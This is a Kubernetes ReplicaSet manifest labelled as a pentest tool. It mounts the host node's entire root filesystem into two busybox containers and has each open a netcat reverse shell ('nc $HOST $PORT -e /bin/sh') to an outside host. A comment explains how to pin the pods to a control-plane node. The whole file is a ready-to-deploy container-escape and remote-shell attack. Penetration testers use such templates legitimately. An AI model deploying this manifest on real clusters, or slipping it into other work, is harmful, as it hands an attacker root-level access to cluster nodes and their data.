apiVersion: apps/v1
kind: ReplicaSet
metadata:
  name: hostpath-revshell-replicaset
  labels:
    app: pentest
    type: replicaset
spec:
  replicas: 2
  selector:
    matchLabels:
      type: replicaset
  template:
    metadata:
      labels:
        app: pentest
        type: replicaset
    spec:
      containers:
      - name: hostpath-revshell-replicaset
        image: busybox
        volumeMounts:
        - mountPath: /host
          name: noderoot
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "nc $HOST $PORT  -e /bin/sh;" ]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      volumes:
      - name: noderoot
        hostPath:
          path: /
      